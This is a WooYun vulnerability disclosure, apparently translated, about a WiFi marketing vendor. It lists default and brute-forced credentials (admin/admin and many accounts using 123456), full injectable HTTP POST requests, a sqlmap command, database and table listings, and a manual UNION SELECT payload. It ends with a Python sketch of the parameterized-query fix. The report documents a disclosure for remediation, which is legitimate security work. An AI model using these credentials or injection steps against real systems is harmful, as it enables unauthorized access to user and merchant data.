
Vulnerability summary

Defect ID: wooyun-2016-0208462

Title: WiFi security: 周边云 weak passwords on multiple systems + SQL injection bundle (5.83 million merchant records involved + a large number of orders; app information can be modified)

Affected vendor: 北京和瑞创想科技有限公司

Author: 黑色键盘丶

Submitted: 2016-05-14 11:00

Fix deadline: 2016-07-02 13:50

Public disclosure: 2016-07-02 13:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-05-14: Details sent to the vendor; awaiting the vendor's handling
2016-05-18: Vendor confirmed; details visible to the vendor only
2016-05-28: Details opened to core white hats and experts in the relevant field
2016-06-07: Details opened to regular white hats
2016-06-17: Details opened to intern white hats
2016-07-02: Details opened to the public

Brief description:

See title.

Detailed description:

First: **.**.**.**:10001/admin.php/Index/index.html, logged in with admin / admin.


This back end can modify app information, but otherwise there is not much that can be done from it.

1.png


2.png


--------------------------------------------------------------------

Then on to http://**.**.**.**/, the merchant management back end, and tried brute-forcing it.


3.png


Here, every entry with status 376 can log in with password 123456 (quite a few of them); the ones with status 383 are probably correct usernames.
chengxin 123456
jinyue 123456
lining 123456
qingxin 123456
wangchao 123456
wangxin 123456
xiaodong 123456
xuxiaomei 123456
yanghong 123456
yun 123456


Then logged in to the 王鑫汽车 account.


34.png


From here the app can be managed.


45.png


Found a SQL injection in this back end.
sqlmap command: sqlmap.py -r 1.txt --dbs
--------------------- POST request ---------- parameter catid --------- this injection point is in the "edit category" function
POST /o2o/updateProductCateGrop.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/o2o/productCateGropInit.do
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522; JSESSIONID=1da7df7b-bac2-44de-9ebe-86eda561443b
catid=7316&cateGropName=1&ordernum=11


Database information
back-end DBMS: MySQL 5.0
available databases [17]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_cloub
[*] auth_wifi
[*] auth_wifi_databak
[*] auth_wifi_toline
[*] billing_system
[*] information_schema
[*] mdlch
[*] personal_tailor
[*] pkg_platform
[*] red_packets
[*] st_mdl
[*] tenant
[*] test
[*] trade_01


Tables in the current database: this is where the 5.83 million merchant records and the 630k order records are
Database: auth_wifi
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| st_login_log | 14110424 |
| st_day_login | 12605281 |
| auth_connections_history | 11849367 |
| st_hour_count | 10752818 |
| wifi_user_shop | 8411638 |
| wifi_user_device | 5865862 |
| wifi_user | 5836911 |
| st_day_login_8history | 3686906 |
| stat_day | 1664443 |
| agent_ad_order_time | 1118218 |
| wifi_user_online_time | 982065 |
| auth_user | 802278 |
| auth_user_group_relate | 749158 |
| app_click_log | 697793 |
| zn_app_order | 639375 |
| zn_app_pay | 443122 |
| mdl_user_score_details | 393232 |
| auth_connections_tmp | 359406 |
| users_login_log | 299028 |
| st_day_area | 258574 |
| mdl_user | 241478 |
| mdl_user_20160504 | 212262 |
| mdl_user_wxinfo | 165720 |
| zn_st_settle_accounts | 139458 |
| auth_usergroup | 139208 |
| cash_auth_shop_day | 138273 |
| wap_stat_log | 133454 |
| mdl_user_coupon | 92528 |
| nodes_201504 | 86145 |
| nodes_201505 | 84555 |
| agent_child_day | 80292 |
| stat_month | 76690 |
| nodes_201506 | 76265 |
| wap_activity_menu | 76166 |
| nodes_201502 | 74710 |
| nodes_201501 | 74646 |
| nodes_201507 | 73591 |
| zn_app_tables | 71047 |
| nodes_201508 | 69654 |
| nodes_201509 | 61986 |
| shop_online_user | 61847 |
| f_agent_category | 57046 |
| user_roles | 53314 |
| user_role_module | 52786 |
| users | 52692 |
| auth_shop | 51980 |
| nodes_201503 | 49728 |
| sms_log | 47529 |
| auth_shop_mid | 42678 |
| auth_shop_20160127 | 42549 |
| users_20151222 | 40232 |
| zn_app_client | 40159 |
| mdl_redpacket_details | 37415 |
| auth_shop_module | 36411 |
| zn_app_product | 36125 |
| auth_shop_copy | 33355 |
| ad_advertis | 30122 |
| zn_app_shop_module | 28721 |
| mdl_table_category | 26740 |
| nodes | 25450 |
| auth_hotspot_count | 23498 |
| zn_app_order_group_buy | 23083 |
| auth_hotspot | 20274 |
| zn_app_install_day | 18733 |
| nodes_201510 | 18055 |
| auth_shop_bak | 17872 |
| user_role_module_bak | 15904 |
| wap_activity_feature | 15831 |
| weixin_userinfo | 14611 |
| auth_connections | 14045 |
| zn_app_order_detail | 13708 |
| auth_shop_card_detail | 12481 |
| device_router_bak | 12006 |
| device_router | 10327 | probably 10k+ routers' information
| zn_app_user | 10290 |
| agent_ad_order_industry | 10199 |
| zn_app_group_buy | 8195 |
| zn_app_tables_fr | 7976 |
| zn_app_group_setmeal | 7706 |
| zn_app_product_categroy | 7316 |
| cash_auth_agent_day | 7007 |
| zn_app_ad | 6688 |
| auth_black_list | 6449 |
| agent_ad_show_log | 5347 |
| auth_shop_dynamicimage | 5319 |
| mdl_code_Jurisdiction | 5098 |
| agent_ad_st_industry_day | 4337 |
| zn_app_pay_history | 4012 |
| bossclick_msg | 3986 |
| dic_base_area | 3570 |
| auth_agent_order | 3405 |
| dic_county | 3173 |
| zn_app_mobile_click | 3127 |
| agent_ad_st_time_day | 3094 |
| zn_app_group_buy_bak | 2948 |
| zn_app_fastbuy_groupbuy | 2837 |
| zn_app_shop_groupbuynum | 2706 |
| auth_bussiness_department | 2558 |
| zn_app_hot_groupbuy | 2430 |
| zn_app_topic_groupbuy | 1684 |
| zn_app_activity_feature | 1681 |
| agent_ad_order_province | 1563 |
| auth_bussiness_news | 1482 |
| zn_app_version_his | 1389 |
| agent_ad_order_hotspot | 1305 |
| zn_app_agent_categroy | 1236 |
| zn_app_shop_top | 1112 |
| auth_shop_card_awards | 1067 |
| mdl_coupon_activity | 1014 |
| auth_shop_coupon_detail | 994 |
| zn_app_coupon_set | 966 |
| auth_shop_weixin | 961 |
| zn_app_banner | 836 |
| agent_sale | 807 |
| zn_app_agent_area | 684 |
| zn_app_comment | 667 |
| zn_app_topic | 643 |
| agent_online_user | 619 |
| zn_app_favorites_groupbuy | 592 |
| mdl_shop_clerk_wx_alert | 527 |
| agent_child_hour | 516 |
| auth_agent | 516 |
| agent_ad_st_area_day | 496 |
| auth_sms_log | 486 |
| zn_app_user_address | 466 |
| mdl_agent_cate | 455 |
| cash_account | 446 |
| zn_app_favorites | 444 |
| zn_app_agent_categroy_bak | 437 |
| zn_app_agent_fastbuy | 421 |
| auth_shop_print_device | 415 |
| agent_ad_position_day | 384 |
| dic_city | 364 |
| zn_app_pay_refund | 364 |
| zn_app_msg | 362 |
| zn_app_user_coupon | 360 |
| mdl_user_score_duiba_exchange_result | 359 |
| mdl_user_score_duiba_exchange_details | 355 |
| auth_shop_coupon | 339 |
| mdl_first_preferential | 335 |
| st_month_login | 329 |
| zn_app_banner_bak | 322 |
| auth_shop_card | 321 |
| agent_ad_show | 314 |
| zn_app_favorites_product | 286 |
| device_mac_white | 263 |
| f_category | 252 |
| zn_app_category_banner | 222 |
| zn_app_version | 207 |
| auth_agent_bak | 198 |
| auth_shop_card_bak | 198 |
| zn_app_topic_bak | 189 |
| sms_recharge_log | 185 |
| hd_activities | 164 |
| dic_ad_time | 151 |
| zn_app_agent_fastbuy_bak | 145 |
| zn_app_agent_info | 137 |
| auth_agent_buydevice_copy | 133 |
| copy_of_auth_agent_buydevice | 133 |
| mdl_industry_category | 127 |
| hd_userdetail | 122 |
| agent_ad_st_day | 114 |
| f_page | 112 |
| zn_mdl_feedback | 98 |
| auth_agent_pay_cfg | 96 |
| auth_agent_buydevice | 85 |
| agent_ad_order_source | 76 |
| zn_app_category_banner_bak | 68 |
| mdl_micro_subsidy | 67 |
| ad_collect | 66 |
| mdl_micro_subsidy_20160421 | 58 |
| hd_cat | 55 |
| agent_ad_order | 53 |
| st_tmp | 50 |
| zn_app_custom_details | 43 |
| wap_nav | 42 |
| dic_province | 31 |
| temp_group | 31 |
| mdl_agent_bankaccount | 29 |
| dic_mobile | 27 |
| ad_advertis_more | 26 |
| hd_comment | 26 |
| wx_user | 22 |
| radacct | 20 |
| agent_ad_owner | 16 |
| zn_app_product_tmp | 14 |
| counter | 11 |
| p_role | 11 |
| hd_report | 10 |
| auth_agent_open_city | 9 |
| auth_agent_user | 8 |
| dic_ad_position | 8 |
| dic_network | 8 |
| radcheck | 8 |
| dic_base_info | 6 |
| dic_refund_reason | 6 |
| auth_template | 5 |
| mdl_user_buy_score_pay | 5 |
| radgroupreply | 5 |
| auth_agent_buyorder | 4 |
| dic_profit | 4 |
| user_roles_url | 4 |
| auth_group | 3 |
| dic_device | 3 |
| dic_saleteam | 3 |
| mdl_system_config | 3 |
| auth_agent_social_share_cfg | 2 |
| dic_consume_meal | 2 |
| mdl_coin_activity | 2 |
| mdl_shop_welcome | 2 |
| open_token | 2 |
| wap_banner | 2 |
| wap_cat | 2 |
| auth_shop_pay_cfg | 1 |
| cs_product | 1 |
| dic_base_info_type | 1 |
| dic_collect | 1 |
| radgroupcheck | 1 |
| radusergroup | 1 |
| wap_user | 1 |
+---------------------------------------+---------+


There is also an injection in this login request:
POST /ad/login.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 33
Accept: */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522
username=yangfang&password=123456


available databases [6]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_wifi
[*] information_schema
[*] test
Database: ad_wifi
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ad_show_log_bak | 5494020 |
| ad_order_time | 990274 |
| ad_st_time_day | 442304 |
| ad_visit_log | 437092 |
| ad_st_industry_day | 400526 |
| ad_st_area_day | 143023 |
| ad_order_hotspot | 119858 |
| ad_order_industry | 85127 |
| ad_st_day | 30962 |
| ad_order_saleprice | 5626 |
| ad_order_province | 4636 |
| ad_order_source | 3247 |
| ad_owner_industry | 1373 |
| ad_show | 1316 |
| ad_order | 1035 |
| ad_owner | 625 |
| dic_time | 151 |
| ad_show_log | 8 |
| dic_saleprice | 6 |
| ad_agent_set | 4 |
| ad_account | 1 |
| ad_agent_shop | 1 |
| counter | 1 |
+--------------------+---------+


http://**.**.**.**/login.ftl: then on to this system; brute-forced it and one account came out:
yangfan 123456


3333333.png


Found an injection point; practised manual injection on it:
http://**.**.**.**/mdl/index_showDetail.do?pagId=-148%20%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16


It returns the database name


111111.png


Proof of vulnerability:


Fix recommendation:

Enforce stronger passwords and filter the injected parameters.
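As an added illustration of the fix above for the catid injection point (this is not code from the report or from the vendor's system): the category update written first the injectable way, then with integer validation and bound parameters. The in-memory SQLite table reuses the table and parameter names from the report; its rows and the column types are constructed assumptions.

```python
import sqlite3

# Table name taken from the report's listing; schema below is an assumption.
TABLE = "zn_app_product_categroy"


def make_db():
    """Build an in-memory stand-in for the category table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {TABLE} "
                 "(catid INTEGER PRIMARY KEY, cateGropName TEXT, ordernum INTEGER)")
    conn.executemany(f"INSERT INTO {TABLE} VALUES (?, ?, ?)",
                     [(7316, "drinks", 11), (7317, "snacks", 12), (7318, "mains", 13)])
    conn.commit()
    return conn


def update_category_vulnerable(conn, catid, name, ordernum):
    """Concatenates request parameters into the SQL text, so catid is injectable."""
    sql = (f"UPDATE {TABLE} SET cateGropName='{name}', ordernum={ordernum} "
           f"WHERE catid={catid}")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # number of rows actually modified


def require_int(value, field):
    """Accept only a plain decimal integer (optional leading '-'); reject anything else."""
    text = str(value).strip()
    body = text[1:] if text.startswith("-") else text
    if not body.isdigit():
        raise ValueError(f"{field} must be an integer, got {text!r}")
    return int(text)


def is_numeric_param(value):
    """True if the value would pass require_int, e.g. for a pagId/catid parameter."""
    try:
        require_int(value, "param")
        return True
    except ValueError:
        return False


def update_category_safe(conn, catid, name, ordernum):
    """Validates the numeric fields and binds every value through a placeholder."""
    cid = require_int(catid, "catid")
    onum = require_int(ordernum, "ordernum")
    cur = conn.execute(f"UPDATE {TABLE} SET cateGropName=?, ordernum=? WHERE catid=?",
                       (name, onum, cid))
    conn.commit()
    return cur.rowcount


def demo():
    """Run one constructed injection-style catid value against both versions."""
    payload = "7316 OR 1=1"  # constructed value; turns the WHERE clause into 'match all'
    vuln = update_category_vulnerable(make_db(), payload, "x", "11")
    try:
        safe = update_category_safe(make_db(), payload, "x", "11")
    except ValueError:
        safe = "rejected"
    legit = update_category_safe(make_db(), "7316", "x", "11")
    return {"vulnerable": vuln, "safe": safe, "legit": legit}


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 3, 'safe': 'rejected', 'legit': 1}
```

The vulnerable form rewrites every row from a single request, which is the same behaviour that let sqlmap enumerate the databases; the safe form never lets the parameter reach the SQL text.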

Copyright notice: please credit the source when reposting: 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-05-18 13:48

Vendor reply:

CNVD has not directly reproduced the described situation and has not yet established a direct handling channel with the site's operating organization; pending claim.

Latest status:

None


Comments:

  1. 2016-05-14 12:57 | 大师兄 ( Intern white hat | Rank:31 Vulnerabilities:8 | Checks WooYun every day)

    666